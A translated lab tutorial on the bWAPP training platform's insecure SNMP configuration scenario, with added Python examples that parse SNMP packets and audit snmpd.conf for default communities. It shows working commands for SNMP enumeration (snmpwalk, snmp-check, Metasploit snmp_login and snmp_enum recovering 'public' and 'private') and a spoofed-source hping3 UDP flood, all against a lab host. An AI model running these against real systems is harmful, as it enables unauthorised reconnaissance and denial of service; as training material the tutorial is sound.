Web Hacking bWAPP - 72. A5 - Security Misconfiguration - Insecure SNMP Configuration
This material is intended for hands-on practice as part of a training course. Anyone who uses it for personal or malicious purposes bears the legal responsibility.
1. Security Misconfiguration
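- OWASP Top 10 A5 - Security Misconfiguration
- A vulnerability caused by configuration errors in servers, systems, databases, network devices, or web settings.
- Ex) directory listing, error pages, web page comments, web server default settings, Adobe Flash vulnerabilities, DoS/DDoS attacks, Reverse_TCP attacks against specific services, local privilege vulnerabilities, backup/temporary/robots files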
2. Insecure SNMP Configuration
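- SNMP has the problem that the community string, which acts as a pre-shared key between the manager and the agent, is left at its default value or is transmitted in plaintext.
- As a result, an attacker can obtain the community string and then view information about systems/devices and execute commands on them.
- In addition, SNMP messages can be used to carry out DoS/DDoS attacks.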
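The plaintext community described above can be checked from the defender's side. The following is an added example, not part of the original post: a monitor-side parser that reads the header of a UDP/161 payload and flags SNMPv1/v2c messages whose community is readable or is one of the defaults. The function names and the sample packets are constructed for this illustration.

```python
DEFAULT_COMMUNITIES = {"public", "private"}   # the two values recovered on this page
VERSIONS = {0: "v1", 1: "v2c", 3: "v3"}

def read_tlv(buf, pos):
    """Decode one BER TLV starting at pos; return (tag, value, next_pos)."""
    if pos + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                      # long form: low 7 bits count the length octets
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("truncated TLV value")
    return tag, buf[pos:pos + length], pos + length

def inspect_snmp(payload):
    """Report version, community and findings for one UDP/161 payload."""
    tag, msg, _ = read_tlv(payload, 0)
    if tag != 0x30:
        raise ValueError("outer SEQUENCE missing, not an SNMP message")
    tag, ver, pos = read_tlv(msg, 0)
    if tag != 0x02:
        raise ValueError("version INTEGER missing")
    tag, second, _ = read_tlv(msg, pos)
    community, findings = None, []
    if tag == 0x04:                        # OCTET STRING: the v1/v2c community, unencrypted
        community = second.decode("latin-1")
        findings.append("community readable on the wire")
        if community in DEFAULT_COMMUNITIES:
            findings.append("default community string")
    version = VERSIONS.get(int.from_bytes(ver, "big"), "unknown")
    return {"version": version, "community": community, "findings": findings}

def tlv(tag, body):
    """Encode a TLV with a short-form length (body under 128 bytes)."""
    return bytes([tag, len(body)]) + body

def sample_getnext(version, community):
    """Constructed GetNextRequest for 1.3.6.1.2.1.1, the 'system' subtree."""
    oid = tlv(0x06, bytes.fromhex("2b0601020101"))
    varbinds = tlv(0x30, tlv(0x30, oid + tlv(0x05, b"")))
    pdu = tlv(0xA1, tlv(0x02, b"\x01") + tlv(0x02, b"\x00") * 2 + varbinds)
    return tlv(0x30, tlv(0x02, bytes([version])) + tlv(0x04, community) + pdu)

if __name__ == "__main__":
    for pkt in (sample_getnext(0, b"public"), sample_getnext(1, b"private")):
        print(inspect_snmp(pkt))
```

An SNMPv3 message carries a header SEQUENCE in the position where v1/v2c carry the community, so the parser reports no community for it.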
3. Security Misconfiguration - Insecure SNMP Configuration
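- This scenario covers obtaining system information by using the SNMP community string and SNMP messages.
Ex1) Understanding Security Misconfiguration - Insecure SNMP Configuration I
Select the security level and the scenario
Hint : Enumerate the connected/running HTTP processes...?
Install SNMP on bWAPP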
bee@bee-box:/var/www/bWAPP$ sudo apt-get install snmp
[sudo] password for bee: bug
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  snmp
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 158kB of archives.
After this operation, 582kB of additional disk space will be used.
WARNING: The following packages cannot be authenticated!
  snmp
Install these packages without verification [y/N]? y
Get:1 http://old-releases.ubuntu.com hardy/main snmp 5.4.1~dfsg-4ubuntu4 [158kB]
Fetched 158kB in 1s (96.4kB/s)
Selecting previously deselected package snmp.
(Reading database ... 105451 files and directories currently installed.)
Unpacking snmp (from .../snmp_5.4.1~dfsg-4ubuntu4_i386.deb) ...
Setting up snmp (5.4.1~dfsg-4ubuntu4) ...
Check the bWAPP SNMP information
bee@bee-box:~$ snmpwalk -Os -c public -v 1 localhost system
sysDescr.0 = STRING: Linux bee-box 2.6.24-16-generic #1 SMP Thu Apr 10 13:23:42 UTC 2008 i686
sysObjectID.0 = OID: netSnmpAgentOIDs.10
sysUpTimeInstance = Timeticks: (2826951) 7:51:09.51
sysContact.0 = STRING: Your master bee
sysName.0 = STRING: bee-box
sysLocation.0 = STRING: Every bee needs a home!
sysORLastChange.0 = Timeticks: (16) 0:00:00.16
sysORID.1 = OID: snmpFrameworkMIBCompliance
sysORID.2 = OID: snmpMPDCompliance
sysORID.3 = OID: usmMIBCompliance
sysORID.4 = OID: snmpMIB
sysORID.5 = OID: tcpMIB
sysORID.6 = OID: ip
sysORID.7 = OID: udpMIB
sysORID.8 = OID: vacmBasicGroup
sysORDescr.1 = STRING: The SNMP Management Architecture MIB.
sysORDescr.2 = STRING: The MIB for Message Processing and Dispatching.
sysORDescr.3 = STRING: The management information definitions for the SNMP User-based Security Model.
sysORDescr.4 = STRING: The MIB module for SNMPv2 entities
sysORDescr.5 = STRING: The MIB module for managing TCP implementations
sysORDescr.6 = STRING: The MIB module for managing IP and ICMP implementations
sysORDescr.7 = STRING: The MIB module for managing UDP implementations
sysORDescr.8 = STRING: View-based Access Control Model for SNMP.
sysORUpTime.1 = Timeticks: (16) 0:00:00.16
sysORUpTime.2 = Timeticks: (16) 0:00:00.16
sysORUpTime.3 = Timeticks: (16) 0:00:00.16
sysORUpTime.4 = Timeticks: (16) 0:00:00.16
sysORUpTime.5 = Timeticks: (16) 0:00:00.16
sysORUpTime.6 = Timeticks: (16) 0:00:00.16
sysORUpTime.7 = Timeticks: (16) 0:00:00.16
sysORUpTime.8 = Timeticks: (16) 0:00:00.16
bee@bee-box:~$
Run Wireshark and capture on eth1
Obtain the SNMP community string
Confirm community 'private'
Confirm community 'public'
Use snmp-check to view detailed bWAPP information
root@kali:~# snmp-check 192.168.20.205 -c public -p 161 | more
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
[+] Try to connect to 192.168.20.205:161 using SNMPv1 and community 'public'
[*] System information:
Host IP address : 192.168.20.205
Hostname : bee-box
Description : Linux bee-box 2.6.24-16-generic #1 SMP Thu Apr 10 13:23:42 UTC 2008 i686
Contact : Your master bee
Location : Every bee needs a home!
Uptime snmp : 08:06:35.25
Uptime system : 08:05:31.02
System date : 2019-2-19 11:13:50.0
[*] Network information:
IP forwarding enabled : no
Default TTL : 64
TCP segments received : 2910511
TCP segments sent : 265053
--More--
~ (output omitted) ~
Use snmp-check to view detailed bWAPP Apache2 information
root@kali:~# snmp-check 192.168.20.205 -c public -p 161 > bWAPP.snmp
root@kali:~# cat bWAPP.snmp | head -101 | tail -3 ; cat bWAPP.snmp | grep apache2
[*] Processes:
Id Status Name Path Parameters
6892 runnable apache2 /usr/sbin/apache2 -k start
6895 runnable apache2 /usr/sbin/apache2 -k start
6898 runnable apache2 /usr/sbin/fcgi-pm -k start
7018 runnable apache2 /usr/sbin/apache2 -k start
7019 runnable apache2 /usr/sbin/apache2 -k start
7020 runnable apache2 /usr/sbin/apache2 -k start
7021 runnable apache2 /usr/sbin/apache2 -k start
7022 runnable apache2 /usr/sbin/apache2 -k start
9904 runnable apache2 /usr/sbin/apache2 -k start
9937 runnable apache2 /usr/sbin/apache2 -k start
9938 runnable apache2 /usr/sbin/apache2 -k start
9939 runnable apache2 /usr/sbin/apache2 -k start
root@kali:~#
Ex2) Understanding Security Misconfiguration - Insecure SNMP Configuration II
Obtain the SNMP community string
root@kali:~# msfconsole -q
msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(scanner/snmp/snmp_login) >
msf auxiliary(scanner/snmp/snmp_login) > set rhosts 192.168.20.205
rhosts => 192.168.20.205
msf auxiliary(scanner/snmp/snmp_login) > exploit
[!] No active DB -- Credential data will not be saved!
[+] 192.168.20.205:161 - Login Successful: private (Access level: read-write); Proof (sysDescr.0): Linux bee-box 2.6.24-16-generic #1 SMP Thu Apr 10 13:23:42 UTC 2008 i686
[+] 192.168.20.205:161 - Login Successful: public (Access level: read-only); Proof (sysDescr.0): Linux bee-box 2.6.24-16-generic #1 SMP Thu Apr 10 13:23:42 UTC 2008 i686
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/snmp/snmp_login) >
msf auxiliary(scanner/snmp/snmp_login) >
msf auxiliary(scanner/snmp/snmp_login) > use auxiliary/scanner/snmp/snmp_enum
msf auxiliary(scanner/snmp/snmp_enum) >
msf auxiliary(scanner/snmp/snmp_enum) > set rhosts 192.168.20.205
rhosts => 192.168.20.205
msf auxiliary(scanner/snmp/snmp_enum) > exploit
[+] 192.168.20.205, Connected.
[*] System information:
Host IP : 192.168.20.205
Hostname : bee-box
Description : Linux bee-box 2.6.24-16-generic #1 SMP Thu Apr 10 13:23:42 UTC 2008 i686
Contact : Your master bee
Location : Every bee needs a home!
Uptime snmp : 09:28:39.48
Uptime system : 09:27:35.24
System date : 2019-2-19 12:35:54.0
~ (output omitted) ~
msf auxiliary(scanner/snmp/snmp_enum) >
msf auxiliary(scanner/snmp/snmp_enum) > use auxiliary/scanner/snmp/snmp_enumusers
msf auxiliary(scanner/snmp/snmp_enumusers) > set rhosts 192.168.20.205
rhosts => 192.168.20.205
msf auxiliary(scanner/snmp/snmp_enumusers) > exploit
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/snmp/snmp_enumusers) > quit
root@kali:~#
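The scan result above (public accepted read-only, private accepted read-write) points to the agent's access directives. The following is an added example, not part of the original post: an audit of net-snmp snmpd.conf access directives that flags default communities, write access by community, and missing source restrictions. Both configuration samples are constructed; the page does not show bee-box's actual snmpd.conf, so the weak sample is an assumption that matches the scan result.

```python
DEFAULT_COMMUNITIES = {"public", "private"}
COMMUNITY_DIRECTIVES = {"rocommunity", "rwcommunity", "rocommunity6", "rwcommunity6"}

def audit_snmpd_conf(text):
    """Return (line_no, message) findings for the access directives in a snmpd.conf."""
    findings, v3_user = [], False
    for no, raw in enumerate(text.splitlines(), 1):
        tokens = raw.split("#", 1)[0].split()      # drop comments, split on whitespace
        if not tokens:
            continue
        directive, args = tokens[0].lower(), tokens[1:]
        if directive in ("rouser", "rwuser") and args:
            v3_user = True
            if "priv" not in args:                 # level omitted or weaker than priv
                findings.append((no, "SNMPv3 user not required to use privacy (encryption)"))
        elif directive in COMMUNITY_DIRECTIVES and args:
            if directive.startswith("rw"):
                findings.append((no, "read-write access granted by community string"))
            if args[0] in DEFAULT_COMMUNITIES:
                findings.append((no, f"default community string '{args[0]}'"))
            if len(args) < 2 or args[1] == "default":
                findings.append((no, "no source address restriction"))
    if not v3_user:
        findings.append((0, "no SNMPv3 user (rouser/rwuser) defined"))
    return findings

WEAK_CONF = """\
# constructed sample: consistent with the scan result, not copied from bee-box
rocommunity public
rwcommunity private
"""

HARDENED_CONF = """\
# constructed sample: SNMPv3 authPriv user limited to the system subtree
agentAddress udp:127.0.0.1:161
view systemonly included .1.3.6.1.2.1.1
createUser monitor SHA "constructed-auth-pass" AES "constructed-priv-pass"
rouser monitor priv -V systemonly
"""

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_snmpd_conf(conf))
```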
Ex3) Understanding Security Misconfiguration - Insecure SNMP Configuration III
bee@bee-box:~$ gnome-system-monitor &
[1] 4342
Run the system monitoring tool on bWAPP
Perform a UDP flooding attack
root@kali:~# hping3 --udp 192.168.20.205 -p 161 -a 1.2.3.4 --flood
HPING 192.168.20.205 (eth1 192.168.20.205): udp mode set, 28 headers + 0 data bytes
hping in flood mode, no replies will be shown
(Ctrl+C)
--- 192.168.20.205 hping statistic ---
1588649 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
root@kali:~#
Confirm that load is generated on bWAPP
[YouTube] Video lecture link
Web Hacking 72. A5 - bWAPP Security Misconfiguration - Insecure SNMP Configuration https://youtu.be/33Q4QvDoAU4